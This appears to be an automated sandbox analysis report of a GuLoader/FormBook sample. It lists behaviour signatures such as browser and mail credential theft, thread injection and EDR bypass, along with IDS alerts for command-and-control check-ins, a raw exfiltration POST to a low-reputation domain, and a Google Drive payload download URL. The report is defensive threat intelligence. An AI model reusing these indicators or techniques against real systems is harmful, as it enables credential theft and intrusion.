Edit tour

Windows Analysis Report
mF8WNclxnv.exe

Overview

General Information

Sample name:	mF8WNclxnv.exe renamed because original name is a hash value
Original sample name:	b3d9c73d050313d57637cb17336f4c9f7b5769c69b00d31727040b9e173461ff.exe
Analysis ID:	1631824
MD5:	d4fdce532a67cfb263f62ca5090f65f0
SHA1:	c87504bfa88e23f3a94584329de0d229b6109cdc
SHA256:	b3d9c73d050313d57637cb17336f4c9f7b5769c69b00d31727040b9e173461ff
Tags:	exeuser-adrian__luca
Infos:

Detection

FormBook, GuLoader

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

Yara detected GuLoader

AI detected suspicious PE digital signature

Found direct / indirect Syscall (likely to bypass EDR)

Joe Sandbox ML detected suspicious sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

mF8WNclxnv.exe (PID: 6768 cmdline: "C:\Users\user\Desktop\mF8WNclxnv.exe" MD5: D4FDCE532A67CFB263F62CA5090F65F0)

mF8WNclxnv.exe (PID: 2080 cmdline: "C:\Users\user\Desktop\mF8WNclxnv.exe" MD5: D4FDCE532A67CFB263F62CA5090F65F0)

Kf2uv5NZsp.exe (PID: 5172 cmdline: "C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

PresentationHost.exe (PID: 1796 cmdline: "C:\Windows\SysWOW64\PresentationHost.exe" MD5: C6671F8B9F073785FD617661AD1F1C45)

firefox.exe (PID: 2400 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000008.00000002.2314642445.0000000033860000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000B.00000002.3430583789.0000000007B80000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000C.00000002.3424813910.0000000002F60000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000B.00000002.3426199689.0000000004CC0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.2315053520.0000000035AD0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.1888435402.000000000681A000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Click to see the 1 entries

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T16:23:08.788006+0100	2803270	2	Potentially Bad Traffic	192.168.2.9	49691	142.250.185.142	443	TCP

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T16:23:48.964332+0100	2855465	1	A Network Trojan was detected	192.168.2.9	49693	3.33.130.190	80	TCP
2025-03-07T16:24:12.306219+0100	2855465	1	A Network Trojan was detected	192.168.2.9	49697	13.248.169.48	80	TCP
2025-03-07T16:24:25.618459+0100	2855465	1	A Network Trojan was detected	192.168.2.9	49701	199.59.243.228	80	TCP
2025-03-07T16:24:38.906491+0100	2855465	1	A Network Trojan was detected	192.168.2.9	49705	199.59.243.228	80	TCP
2025-03-07T16:24:52.364418+0100	2855465	1	A Network Trojan was detected	192.168.2.9	49709	46.30.136.130	80	TCP
2025-03-07T16:25:05.858869+0100	2855465	1	A Network Trojan was detected	192.168.2.9	49714	84.32.84.32	80	TCP
2025-03-07T16:25:21.781054+0100	2855465	1	A Network Trojan was detected	192.168.2.9	49718	47.83.1.90	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T16:24:04.546375+0100	2855464	1	A Network Trojan was detected	192.168.2.9	49694	13.248.169.48	80	TCP
2025-03-07T16:24:07.201181+0100	2855464	1	A Network Trojan was detected	192.168.2.9	49695	13.248.169.48	80	TCP
2025-03-07T16:24:09.768046+0100	2855464	1	A Network Trojan was detected	192.168.2.9	49696	13.248.169.48	80	TCP
2025-03-07T16:24:17.880197+0100	2855464	1	A Network Trojan was detected	192.168.2.9	49698	199.59.243.228	80	TCP
2025-03-07T16:24:20.447949+0100	2855464	1	A Network Trojan was detected	192.168.2.9	49699	199.59.243.228	80	TCP
2025-03-07T16:24:23.027798+0100	2855464	1	A Network Trojan was detected	192.168.2.9	49700	199.59.243.228	80	TCP
2025-03-07T16:24:31.256532+0100	2855464	1	A Network Trojan was detected	192.168.2.9	49702	199.59.243.228	80	TCP
2025-03-07T16:24:33.782231+0100	2855464	1	A Network Trojan was detected	192.168.2.9	49703	199.59.243.228	80	TCP
2025-03-07T16:24:36.334913+0100	2855464	1	A Network Trojan was detected	192.168.2.9	49704	199.59.243.228	80	TCP
2025-03-07T16:24:44.656476+0100	2855464	1	A Network Trojan was detected	192.168.2.9	49706	46.30.136.130	80	TCP
2025-03-07T16:24:47.210835+0100	2855464	1	A Network Trojan was detected	192.168.2.9	49707	46.30.136.130	80	TCP
2025-03-07T16:24:49.763049+0100	2855464	1	A Network Trojan was detected	192.168.2.9	49708	46.30.136.130	80	TCP
2025-03-07T16:24:58.066989+0100	2855464	1	A Network Trojan was detected	192.168.2.9	49711	84.32.84.32	80	TCP
2025-03-07T16:25:00.709849+0100	2855464	1	A Network Trojan was detected	192.168.2.9	49712	84.32.84.32	80	TCP
2025-03-07T16:25:03.340546+0100	2855464	1	A Network Trojan was detected	192.168.2.9	49713	84.32.84.32	80	TCP
2025-03-07T16:25:12.446664+0100	2855464	1	A Network Trojan was detected	192.168.2.9	49715	47.83.1.90	80	TCP
2025-03-07T16:25:14.993050+0100	2855464	1	A Network Trojan was detected	192.168.2.9	49716	47.83.1.90	80	TCP
2025-03-07T16:25:17.558628+0100	2855464	1	A Network Trojan was detected	192.168.2.9	49717	47.83.1.90	80	TCP
2025-03-07T16:25:27.359555+0100	2855464	1	A Network Trojan was detected	192.168.2.9	49719	13.248.169.48	80	TCP
2025-03-07T16:25:29.921276+0100	2855464	1	A Network Trojan was detected	192.168.2.9	49720	13.248.169.48	80	TCP
2025-03-07T16:25:33.132797+0100	2855464	1	A Network Trojan was detected	192.168.2.9	49721	13.248.169.48	80	TCP

HTTP traffic detected: POST /a4nz/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 196Host: www.dappbtc.xyzOrigin: http://www.dappbtc.xyzReferer: http://www.dappbtc.xyz/a4nz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome 45.0.2454.85 Safari/537.36Data Raw: 4f 74 6e 70 56 7a 59 3d 4d 74 70 61 76 32 54 46 37 4e 79 76 50 70 58 41 43 57 51 77 6e 30 45 33 64 44 4e 4e 34 57 78 62 38 72 46 45 55 52 53 68 32 56 6a 76 6a 47 72 56 65 4c 42 4a 49 32 33 6a 52 47 39 70 55 4d 47 71 68 38 50 61 45 66 68 74 4a 37 72 2b 6c 43 6f 38 6f 4c 37 46 71 72 32 5a 70 49 54 59 44 43 57 77 42 6e 54 51 65 2b 43 6b 36 2f 68 33 4f 43 59 6a 4c 39 46 57 33 68 63 59 58 33 49 55 37 6a 6c 59 38 53 42 32 69 2b 56 6a 6d 42 46 38 37 31 51 38 38 5a 34 32 4b 52 4f 53 63 74 50 4f 51 6e 46 41 6e 65 71 75 48 78 36 72 72 7a 30 56 75 30 71 5a 76 49 51 4e 31 6a 6d 31 42 72 52 44 Data Ascii: OtnpVzY=Mtpav2TF7NyvPpXACWQwn0E3dDNN4Wxb8rFEURSh2VjvjGrVeLBJI23jRG9pUMGqh8PaEfhtJ7r+lCo8oL7Fqr2ZpITYDCWwBnTQe+Ck6/h3OCYjL9FW3hcYX3IU7jlY8SB2i+VjmBF871Q88Z42KROSctPOQnFAnequHx6rrz0Vu0qZvIQN1jm1BrRD

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Mar 2025 15:24:44 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Mar 2025 15:24:47 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Mar 2025 15:24:49 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Mar 2025 15:24:52 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Source: mF8WNclxnv.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: mF8WNclxnv.exe, 00000008.00000001.1885572559.0000000000649000.00000020.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
Source: Kf2uv5NZsp.exe, 0000000B.00000002.3430583789.0000000007C24000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.hypereth.xyz
Source: Kf2uv5NZsp.exe, 0000000B.00000002.3430583789.0000000007C24000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.hypereth.xyz/tnp4/
Source: mF8WNclxnv.exe, 00000008.00000001.1885572559.00000000005F2000.00000020.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: mF8WNclxnv.exe, 00000008.00000001.1885572559.00000000005F2000.00000020.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: PresentationHost.exe, 0000000C.00000002.3428898470.00000000083C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: mF8WNclxnv.exe, 00000008.00000003.2005379037.00000000039F2000.00000004.00000020.00020000.00000000.sdmp, mF8WNclxnv.exe, 00000008.00000003.2005456737.00000000039F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: PresentationHost.exe, 0000000C.00000002.3428898470.00000000083C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: PresentationHost.exe, 0000000C.00000002.3428898470.00000000083C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: PresentationHost.exe, 0000000C.00000002.3428898470.00000000083C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: mF8WNclxnv.exe, 00000008.00000002.2286449185.0000000003988000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/5R
Source: mF8WNclxnv.exe, 00000008.00000002.2286449185.0000000003988000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/eR
Source: mF8WNclxnv.exe, 00000008.00000002.2286449185.0000000003988000.00000004.00000020.00020000.00000000.sdmp, mF8WNclxnv.exe, 00000008.00000002.2286418630.0000000003900000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1MFRNZtVchGfitb5ocqetD889UhLAl8oE
Source: mF8WNclxnv.exe, 00000008.00000002.2286449185.0000000003988000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1MFRNZtVchGfitb5ocqetD889UhLAl8oE3U
Source: mF8WNclxnv.exe, 00000008.00000002.2286449185.0000000003988000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1MFRNZtVchGfitb5ocqetD889UhLAl8oEP
Source: mF8WNclxnv.exe, 00000008.00000002.2286449185.0000000003988000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1MFRNZtVchGfitb5ocqetD889UhLAl8oEa
Source: mF8WNclxnv.exe, 00000008.00000002.2286449185.0000000003988000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1MFRNZtVchGfitb5ocqetD889UhLAl8oEq
Source: mF8WNclxnv.exe, 00000008.00000002.2286449185.0000000003988000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1MFRNZtVchGfitb5ocqetD889UhLAl8oEsY
Source: mF8WNclxnv.exe, 00000008.00000002.2286593700.00000000039F2000.00000004.00000020.00020000.00000000.sdmp, mF8WNclxnv.exe, 00000008.00000003.2179927946.00000000039EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: mF8WNclxnv.exe, 00000008.00000002.2286593700.00000000039F2000.00000004.00000020.00020000.00000000.sdmp, mF8WNclxnv.exe, 00000008.00000003.2179927946.00000000039EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/;a
Source: mF8WNclxnv.exe, 00000008.00000003.2180153393.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, mF8WNclxnv.exe, 00000008.00000003.2005379037.00000000039F2000.00000004.00000020.00020000.00000000.sdmp, mF8WNclxnv.exe, 00000008.00000003.2005456737.00000000039F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1MFRNZtVchGfitb5ocqetD889UhLAl8oE&export=download
Source: PresentationHost.exe, 0000000C.00000002.3428898470.00000000083C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?q=
Source: PresentationHost.exe, 0000000C.00000002.3428898470.00000000083C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: PresentationHost.exe, 0000000C.00000002.3428898470.00000000083C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: PresentationHost.exe, 0000000C.00000002.3428898470.00000000083C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: mF8WNclxnv.exe, 00000008.00000001.1885572559.0000000000649000.00000020.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: PresentationHost.exe, 0000000C.00000002.3425025369.000000000337C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service:
Source: PresentationHost.exe, 0000000C.00000002.3425025369.000000000337C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: PresentationHost.exe, 0000000C.00000002.3425025369.000000000337C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: PresentationHost.exe, 0000000C.00000002.3425025369.000000000337C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2LMEM
Source: PresentationHost.exe, 0000000C.00000002.3425025369.000000000337C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: PresentationHost.exe, 0000000C.00000002.3425025369.000000000337C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
Source: PresentationHost.exe, 0000000C.00000002.3425025369.000000000337C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: PresentationHost.exe, 0000000C.00000002.3425025369.000000000337C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: PresentationHost.exe, 0000000C.00000002.3425025369.000000000337C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: mF8WNclxnv.exe, 00000008.00000003.2005379037.00000000039F2000.00000004.00000020.00020000.00000000.sdmp, mF8WNclxnv.exe, 00000008.00000003.2005456737.00000000039F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: PresentationHost.exe, 0000000C.00000002.3428898470.00000000083C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20Y&
Source: mF8WNclxnv.exe, 00000008.00000003.2005379037.00000000039F2000.00000004.00000020.00020000.00000000.sdmp, mF8WNclxnv.exe, 00000008.00000003.2005456737.00000000039F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: mF8WNclxnv.exe, 00000008.00000003.2005379037.00000000039F2000.00000004.00000020.00020000.00000000.sdmp, mF8WNclxnv.exe, 00000008.00000003.2005456737.00000000039F2000.00000004.00000020.00020000.00000000.sdmp, Kf2uv5NZsp.exe, 0000000B.00000002.3429221434.0000000005E58000.00000004.80000000.00040000.00000000.sdmp, Kf2uv5NZsp.exe, 0000000B.00000002.3429221434.0000000005FEA000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 0000000C.00000002.3426931701.000000000616A000.00000004.10000000.00040000.00000000.sdmp, PresentationHost.exe, 0000000C.00000002.3426931701.0000000005FD8000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: PresentationHost.exe, 0000000C.00000002.3428898470.00000000083C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp
Source: mF8WNclxnv.exe, 00000008.00000002.2286522038.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, mF8WNclxnv.exe, 00000008.00000003.2180153393.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, mF8WNclxnv.exe, 00000008.00000003.2005379037.00000000039F2000.00000004.00000020.00020000.00000000.sdmp, mF8WNclxnv.exe, 00000008.00000003.2005456737.00000000039F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: mF8WNclxnv.exe, 00000008.00000002.2286522038.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, mF8WNclxnv.exe, 00000008.00000003.2180153393.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, mF8WNclxnv.exe, 00000008.00000003.2005379037.00000000039F2000.00000004.00000020.00020000.00000000.sdmp, mF8WNclxnv.exe, 00000008.00000003.2005456737.00000000039F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49692
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown	Network traffic detected: HTTP traffic on port 49692 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49691 -> 443

Source: unknown	HTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.9:49691 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.9:49692 version: TLS 1.2

Source: C:\Users\user\Desktop\mF8WNclxnv.exe

Code function: 0_2_0040541C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_0040541C

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 00000008.00000002.2314642445.0000000033860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3430583789.0000000007B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3424813910.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3426199689.0000000004CC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2315053520.0000000035AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\mF8WNclxnv.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339F35C0 NtCreateMutant,LdrInitializeThunk,	8_2_339F35C0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339F2DF0 NtQuerySystemInformation,LdrInitializeThunk,	8_2_339F2DF0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339F3090 NtSetValueKey,	8_2_339F3090
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339F3010 NtOpenDirectoryObject,	8_2_339F3010
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339F39B0 NtGetContextThread,	8_2_339F39B0
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339F3D10 NtOpenProcessToken,	8_2_339F3D10
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339F3D70 NtOpenThread,	8_2_339F3D70
